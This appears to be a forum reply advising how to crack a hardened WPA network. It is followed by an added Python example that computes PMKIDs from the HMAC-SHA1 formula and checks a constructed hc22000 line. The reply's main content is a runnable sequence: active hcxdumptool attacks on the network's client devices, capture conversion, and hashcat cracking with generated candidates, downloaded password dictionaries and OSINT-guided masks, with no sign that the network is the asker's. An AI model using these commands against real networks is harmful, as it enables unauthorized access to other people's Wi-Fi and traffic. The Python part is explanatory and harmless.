I don't think that this kind of AP is using PMKID caching, because that doesn't make sense if the MAC changes often.
Please notice that the PMKID depends on the MAC:
Code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Maybe one of the CLIENTs of this NETWORK is weak (M1M2ROGUE). Try to attack them instead of the hardened AP:
Code:
$ hcxdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100
Run the attack for some hours to make sure you get as much information as possible from CLIENTs.
If there are other APs or CLIENTs in range that you are not targeting, I recommend protecting them with BPFC.
from --help:
create BPF to protect a MAC
Code:
$ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf
add all MACs to protect (each MAC as addr1 and addr2) separated by "and not wlan"
and run hcxdumptool with activated BPF:
Code:
$ hcxdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100 --bpfc=protect.bpf
Then convert to hc22000:
Code:
$ hcxpcapngtool -E wl -I wl -U wl --all -o test.hc22000 dumpfile.pcapng
Please notice:
We have to use --all, because NC is currently broken on hashcat.
https://hashcat.net/forum/thread-10253-p...#pid53602l
Now use hashcat on the recorded traffic as a first attempt:
Code:
$ hashcat -m 22000 test.hc22000 wl
proceed with hcxpsktool:
Code:
$ hcxpsktool -c test.hc22000 --weakpass --eudate --usdate --wpskeys | hashcat -m 22000 test.hc22000
proceed with wpa-sec confirmed lists:
Code:
$ wget https://wpa-sec.stanev.org/dict/rkg.txt.gz
$ hashcat -m 22000 test.hc22000 rkg.txt.gz
$ wget https://wpa-sec.stanev.org/dict/cracked.txt.gz
$ hashcat -m 22000 test.hc22000 cracked.txt.gz
If that doesn't work, do some open source intelligence (OSINT) via DuckDuckGo picture search and try some masks and rules.
These wordlists may be useful, too:
https://3wifi.stascorp.com/3wifi-dic-2021-09-03.7z
https://hashmob.net/downloads
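As an added example (not code from the post or from the hcx tools), here is the PMKID formula quoted at the top in Python, showing why a PMKID cached for one AP MAC is useless once that MAC changes, plus a check of a type-01 hc22000 line against a PMK you already know (e.g. for your own network). The PMK, MAC addresses and the hc22000 line are constructed; the line layout `WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***` is assumed to follow hashcat's documented format.

```python
import hashlib
import hmac


def mac_bytes(mac: str) -> bytes:
    """Accept '11:22:33:44:55:66', '11-22-33-44-55-66' or '112233445566'."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def pmkid(pmk: bytes, mac_ap: str, mac_sta: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA):
    the first 16 bytes (128 bits) of an HMAC-SHA1 keyed with the 32-byte PMK."""
    if len(pmk) != 32:
        raise ValueError("PMK must be 32 bytes")
    data = b"PMK Name" + mac_bytes(mac_ap) + mac_bytes(mac_sta)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def parse_hc22000_pmkid(line: str) -> dict:
    """Parse a type-01 (PMKID) hc22000 line: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex*** (assumed layout)."""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not an hc22000 PMKID line")
    return {"pmkid": bytes.fromhex(fields[2]), "mac_ap": fields[3], "mac_sta": fields[4],
            "essid": bytes.fromhex(fields[5]).decode("utf-8", "replace")}


def pmkid_matches_pmk(line: str, pmk: bytes) -> bool:
    """True if the PMKID in the line was produced by this PMK for the recorded MAC pair."""
    h = parse_hc22000_pmkid(line)
    return hmac.compare_digest(h["pmkid"], pmkid(pmk, h["mac_ap"], h["mac_sta"]))


# Constructed values, not from a real capture: a fixed 32-byte PMK, one STA and two AP MACs.
PMK = bytes(range(32))
STA = "aa:bb:cc:dd:ee:01"
AP_OLD, AP_NEW = "00:11:22:33:44:55", "00:11:22:33:44:56"


def demo() -> dict:
    """Same PMK and STA, different AP MAC -> different PMKID, so a PMKSA cached under
    the old PMKID can no longer be referenced once the AP changes its MAC."""
    old, new = pmkid(PMK, AP_OLD, STA), pmkid(PMK, AP_NEW, STA)
    line = "WPA*01*%s*%s*%s*%s***" % (old.hex(), AP_OLD.replace(":", ""),
                                      STA.replace(":", ""), b"TestNet".hex())
    return {"old": old.hex(), "new": new.hex(), "changed": old != new,
            "line_matches": pmkid_matches_pmk(line, PMK),
            "line_matches_other_pmk": pmkid_matches_pmk(line, bytes(32))}


if __name__ == "__main__":
    print(demo())
```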